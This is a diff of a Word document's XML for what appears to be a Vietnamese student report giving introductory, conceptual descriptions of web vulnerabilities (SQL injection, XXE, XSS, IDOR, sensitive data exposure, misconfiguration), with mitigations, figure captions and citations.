+        <w:t xml:space="preserve"> là nơi lưu trữ các nội dung của một website, trên cơ sở dữ liệu có thể lưu thông tin về các tài khoản, mật khẩu, email … của người dùng. Hoặc thậm chí là các thông tin cực kỳ quan trọng như thông tin về thẻ thanh toán và hồ sơ y tế. Vậy nên đây là một mục tiêu phổ biến của Hacker.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6167,6 +6085,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Các cuộc tấn công không chỉ nhắm vào chính máy chủ mà còn vào cách giao tiếp giữa máy chủ và người dùng.</w:t>
       </w:r>
     </w:p>
@@ -6428,7 +6347,6 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>SQL Injection cho phép xóa, chèn, cập nhật, v.v. trên cơ sở dữ liệu của website.</w:t>
       </w:r>
       <w:r>
@@ -6461,16 +6379,15 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:keepNext/>
         <w:jc w:val="center"/>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35101CFF" wp14:editId="5F6902C5">
             <wp:extent cx="4067504" cy="2291552"/>
@@ -6489,7 +6406,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10">
+                    <a:blip r:embed="rId14">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6525,6 +6442,18 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Hình 1.3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
@@ -6551,11 +6480,8 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:keepNext/>
         <w:jc w:val="center"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6580,7 +6506,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11">
+                    <a:blip r:embed="rId15">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6616,71 +6542,87 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Hình 1.4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Kỹ thuật tấn công này dựa vào việc cho phép khai báo External Entity (đối tượng mở rộng) trong phần DTD của dữ liệu XML, attacker có thể khai báo một entity để đọc nội dung của file bất kỳ trong hệ thống nếu trình phân tích XML (parser) được cấu hình không tốt.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Để tránh bị khai thác lỗ hổng này thì cần cấu hình trình phân tích XML (parser), không cho phép sử dụng khai báo External Entity (đối tượng mở rộng) trong phần định kiểu tài liệu DTD.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"b73RHelo","properties":{"formattedCitation":"[2]","plainCitation":"[2]","noteIndex":0},"citationItems":[{"id":8,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/FY9Q6X9W"],"itemData":{"id":8,"type":"webpage","abstract":"Trong thời đại công nghệ phát triển hiện nay, việc đảm bảo an ninh thông tin trên không gian mạng đang là vấn đề dành được nhiều sự quan tâm. Nguy cơ mất an toàn thông tin đang là mối đe dọa lớn và ng...","language":"en","title":"Tổng quan một số kỹ thuật khai thác lỗ hổng bảo mật Web (P1)","URL":"https://viblo.asia/p/tong-quan-mot-so-ky-thuat-khai-thac-lo-hong-bao-mat-web-p1-gGJ59MOP5X2","accessed":{"date-parts":[["2025",9,2]]},"issued":{"date-parts":[["2020",12,15]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:t>[2]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="4"/>
         </w:numPr>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Kỹ thuật tấn công này dựa vào việc cho phép khai báo External Entity (đối tượng mở rộng) trong phần DTD của dữ liệu XML, attacker có thể khai báo một entity để đọc nội dung của file bất kỳ trong hệ thống nếu trình phân tích XML (parser) được cấu hình không tốt.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:ind w:left="1800"/>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Để tránh bị khai thác lỗ hổng này thì cần cấu hình trình phân tích XML (parser), không cho phép sử dụng khai báo External Entity (đối tượng mở rộng) trong phần định kiểu tài liệu DTD.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"b73RHelo","properties":{"formattedCitation":"[2]","plainCitation":"[2]","noteIndex":0},"citationItems":[{"id":8,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/FY9Q6X9W"],"itemData":{"id":8,"type":"webpage","abstract":"Trong thời đại công nghệ phát triển hiện nay, việc đảm bảo an ninh thông tin trên không gian mạng đang là vấn đề dành được nhiều sự quan tâm. Nguy cơ mất an toàn thông tin đang là mối đe dọa lớn và ng...","language":"en","title":"Tổng quan một số kỹ thuật khai thác lỗ hổng bảo mật Web (P1)","URL":"https://viblo.asia/p/tong-quan-mot-so-ky-thuat-khai-thac-lo-hong-bao-mat-web-p1-gGJ59MOP5X2","accessed":{"date-parts":[["2025",9,2]]},"issued":{"date-parts":[["2020",12,15]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:t>[2]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:bCs/>
@@ -6709,21 +6651,28 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:noProof/>
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ja-JP"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73397692" wp14:editId="25286BDC">
-            <wp:extent cx="5760085" cy="2879725"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73397692" wp14:editId="466DBA1F">
+            <wp:extent cx="3300730" cy="2005379"/>
+            <wp:effectExtent l="19050" t="19050" r="13970" b="13970"/>
             <wp:docPr id="10" name="Picture 10" descr="https://images.viblo.asia/full/b2faa243-e1aa-414a-bda6-84c2c731f379.png"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -6737,8 +6686,215 @@
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId16">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect l="13498" t="4296" r="12298" b="5527"/>
+                    <a:stretch/>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3312019" cy="2012238"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:solidFill>
+                        <a:schemeClr val="accent1"/>
+                      </a:solidFill>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Hình 1.5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>K</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ẻ tấn công có thể dùng XSS để gửi những đoạn script độc hại tới một người dùng bất kỳ để lấy cookie, keylogging hoặc tiến hành lừa đảo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Ngoài ra trong một số trường hợp đặc biệt, lỗ hổng XSS còn có thể xảy ra ở phía máy chủ web. Điều này thường gây ra hậu quả nghiêm trọng. Kẻ tấn công có thể đọc được các file nhạy cảm trên máy chủ.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"sBbGBnOM","properties":{"formattedCitation":"[2]","plainCitation":"[2]","noteIndex":0},"citationItems":[{"id":8,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/FY9Q6X9W"],"itemData":{"id":8,"type":"webpage","abstract":"Trong thời đại công nghệ phát triển hiện nay, việc đảm bảo an ninh thông tin trên không gian mạng đang là vấn đề dành được nhiều sự quan tâm. Nguy cơ mất an toàn thông tin đang là mối đe dọa lớn và ng...","language":"en","title":"Tổng quan một số kỹ thuật khai thác lỗ hổng bảo mật Web (P1)","URL":"https://viblo.asia/p/tong-quan-mot-so-ky-thuat-khai-thac-lo-hong-bao-mat-web-p1-gGJ59MOP5X2","accessed":{"date-parts":[["2025",9,2]]},"issued":{"date-parts":[["2020",12,15]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:t>[2]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Insecure Direct Object References</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Đây là trường hợp điển hình của việc cho rằng những gì người dùng nhập vào là tin cậy từ đó dẫn đến lỗ hổng bảo mật. Lỗ hổng này xảy ra khi chương trình cho phép người dùng truy cập các tài nguyên (dữ liệu, các tệp, cơ sở dữ liệu) mà không thực hiện quá trình kiểm soát quyền hạn (hoặc quá trình này không hoàn chỉnh) , dẫn đến kẻ tấn công có thể truy cập một cách bất hợp pháp vào các dữ liệu nhạy cảm, quan trọng trên máy chủ.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Một đoạn mã có module "download.php" và cho phép người dùng tải tệp xuống sử dụng tham số là tên file để tải xuống tệp từ máy chủ. Ví dụ “download.php?file=something.txt”. Do sai sót của nhà phát triển, việc kiểm tra quyền hạn đã bị bỏ qua. Kẻ tấn công có thể sử dụng lỗ hổng này để tải về bất kì tệp nào trên hệ thống mà ứng dụng có quyền truy cập. Chẳng hạn như mã nguồn ứng dụng, tệp nhạy cảm hoặc các dữ liệu khác trên máy chủ.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ja-JP"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41AACC71" wp14:editId="6BFFCDFF">
+            <wp:extent cx="3562709" cy="1955705"/>
+            <wp:effectExtent l="19050" t="19050" r="19050" b="26035"/>
+            <wp:docPr id="13" name="Picture 13" descr="https://images.viblo.asia/full/4d14c4c4-958a-411d-8c1e-6bb4f994d2d8.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 10" descr="https://images.viblo.asia/full/4d14c4c4-958a-411d-8c1e-6bb4f994d2d8.png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12">
+                    <a:blip r:embed="rId17">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6753,14 +6909,16 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5760085" cy="2879725"/>
+                      <a:ext cx="3570023" cy="1959720"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
                     <a:noFill/>
                     <a:ln>
-                      <a:noFill/>
+                      <a:solidFill>
+                        <a:schemeClr val="accent1"/>
+                      </a:solidFill>
                     </a:ln>
                   </pic:spPr>
                 </pic:pic>
@@ -6772,73 +6930,34 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:ind w:left="1800"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>K</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>ẻ tấn công có thể dùng XSS để gửi những đoạn script độc hại tới một người dùng bất kỳ để lấy cookie, keylogging hoặc tiến hành lừa đảo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:ind w:left="1800"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Ngoài ra trong một số trường hợp đặc biệt, lỗ hổng XSS còn có thể xảy ra ở phía máy chủ web. Điều này thường gây ra hậu quả nghiêm trọng. Kẻ tấn công có thể đọc được các file nhạy cảm trên máy chủ.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"sBbGBnOM","properties":{"formattedCitation":"[2]","plainCitation":"[2]","noteIndex":0},"citationItems":[{"id":8,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/FY9Q6X9W"],"itemData":{"id":8,"type":"webpage","abstract":"Trong thời đại công nghệ phát triển hiện nay, việc đảm bảo an ninh thông tin trên không gian mạng đang là vấn đề dành được nhiều sự quan tâm. Nguy cơ mất an toàn thông tin đang là mối đe dọa lớn và ng...","language":"en","title":"Tổng quan một số kỹ thuật khai thác lỗ hổng bảo mật Web (P1)","URL":"https://viblo.asia/p/tong-quan-mot-so-ky-thuat-khai-thac-lo-hong-bao-mat-web-p1-gGJ59MOP5X2","accessed":{"date-parts":[["2025",9,2]]},"issued":{"date-parts":[["2020",12,15]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:t>[2]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Hình 1.6</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Một ví dụ phổ biến khác là chức năng đặt lại mật khẩu dựa vào đầu vào của người dùng để xác định mật khẩu đặt lại. Sau khi nhấp vào URL hợp lệ, kẻ tấn công có thể sửa đổi trường tên người dùng trong URL để “đóng giả” người quản trị.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6860,22 +6979,31 @@
         </w:numPr>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Lỗi cấu hình (Misconfiguration):</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Đây không phải là lỗi trong mã nguồn hay hệ điều hành, mà là sai sót trong quá trình thiết lập và quản trị. Kẻ tấn công khai thác những điểm yếu này để chiếm quyền kiểm soát.</w:t>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Sensitive data exposure</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Lỗ hổng này thuộc về khía cạnh quản lý và mã hóa tài nguyên. Dữ liệu nhạy cảm phải được mã hóa mọi lúc, bao gồm cả khi gửi đi và khi lưu trữ – không được phép có ngoại lệ.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6892,25 +7020,92 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Directory Listing (Liệt kê thư mục):</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Khi web server được cấu hình cho phép hiển thị nội dung của một thư mục, kẻ tấn công có thể dễ dàng xem danh sách tệp, bao gồm cả những tệp nhạy cảm như tệp sao lưu hay </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="4" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="4"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>tệp cấu hình chứa thông tin đăng nhập.</w:t>
-      </w:r>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Thông tin thẻ tín dụng và mật khẩu người dùng không bao giờ được gửi đi hoặc được lưu trữ không mã hóa. Ngoài ra, các tiêu chuẩn an ninh web đề nghị sử dụng AES (256 bit trở lên) và RSA (2048 bit trở lên).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ja-JP"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03F77048" wp14:editId="797FF09B">
+            <wp:extent cx="4025900" cy="2579426"/>
+            <wp:effectExtent l="19050" t="19050" r="12700" b="11430"/>
+            <wp:docPr id="14" name="Picture 14" descr="https://images.viblo.asia/ab9fa10c-152a-4ab2-962a-3d138ff89ef1.jpg"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 12" descr="https://images.viblo.asia/ab9fa10c-152a-4ab2-962a-3d138ff89ef1.jpg"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4041349" cy="2589324"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:solidFill>
+                        <a:schemeClr val="accent1"/>
+                      </a:solidFill>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Hình 5 </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Hình_5 \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>5</w:t>
+        </w:r>
+      </w:fldSimple>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6926,16 +7121,46 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Default Credentials (Thông tin đăng nhập mặc định):</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Nhiều dịch vụ web vẫn giữ lại tên người dùng và mật khẩu mặc định sau khi cài đặt. Kẻ tấn công có thể sử dụng những thông tin này để truy cập trái phép.</w:t>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Việc để lộ các dữ liệu nhạy cảm có thể làm ảnh hưởng nghiêm trọng đến hệ thống, rò rỉ các thông tin có giá trị cao khiến kẻ tấn công có thể lợi dụng các thông tin này để phát động các cuộc tấn công khác nguy hiểm hơn rất nhiều.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
